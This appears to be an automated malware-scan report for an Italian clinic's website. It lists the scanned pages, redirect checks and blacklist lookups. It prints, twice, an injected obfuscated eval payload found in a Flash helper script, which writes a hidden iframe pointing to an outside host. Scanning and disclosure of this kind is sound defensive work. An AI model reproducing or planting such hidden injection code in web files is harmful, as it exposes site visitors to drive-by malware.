Scanned pages/files
Request | Server response | Status |
http://centroclaro.com/ | 200 OK Content-Length: 5784 Content-Type: text/html | clean |
http://centroclaro.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8749 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { return ret; } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://centroclaro.com/index-2.html | 200 OK Content-Length: 5859 Content-Type: text/html | clean |
http://centroclaro.com/servizi.html | 200 OK Content-Length: 5027 Content-Type: text/html | clean |
http://centroclaro.com/promozioni.html | 200 OK Content-Length: 3623 Content-Type: text/html | clean |
http://centroclaro.com/dove_siamo.html | 200 OK Content-Length: 3518 Content-Type: text/html | clean |
http://centroclaro.com/contatti.html | 200 OK Content-Length: 5973 Content-Type: text/html | clean |
http://centroclaro.com/note_legali.htm | 200 OK Content-Length: 5028 Content-Type: text/html | clean |
http://centroclaro.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://centroclaro.com/dati_personali.htm | 200 OK Content-Length: 7937 Content-Type: text/html | clean |
http://centroclaro.com/ecografia/ardea.html | 200 OK Content-Length: 6981 Content-Type: text/html | clean |
http://centroclaro.com/ecografia/../Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8749 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { return ret; } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://centroclaro.com/ecografia/../index-2.html | 200 OK Content-Length: 5859 Content-Type: text/html | clean |
http://centroclaro.com/ecografia/../servizi.html | 200 OK Content-Length: 5027 Content-Type: text/html | clean |
http://centroclaro.com/ecografia/../promozioni.html | 200 OK Content-Length: 3623 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: centroclaro.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 22:13:27 GMT
Accept-Ranges: bytes
ETag: "4441181-1698-4f841819110a0"
Server: Apache
Vary: Accept-Encoding
Content-Length: 5784
Content-Type: text/html
Last-Modified: Wed, 30 Apr 2014 12:15:37 GMT
...5784 bytes of data.
GET / HTTP/1.1
Host: centroclaro.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 22:13:27 GMT
Accept-Ranges: bytes
ETag: "4441181-1698-4f841819110a0"
Server: Apache
Vary: Accept-Encoding
Content-Length: 5784
Content-Type: text/html
Last-Modified: Wed, 30 Apr 2014 12:15:37 GMT
...5784 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: centroclaro.com
Referer: http://www.google.com/search?q=centroclaro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: centroclaro.com
Referer: http://www.google.com/search?q=centroclaro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=centroclaro.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://centroclaro.com/
Result: centroclaro.com is not infected or malware details are not published yet.
Result: centroclaro.com is not infected or malware details are not published yet.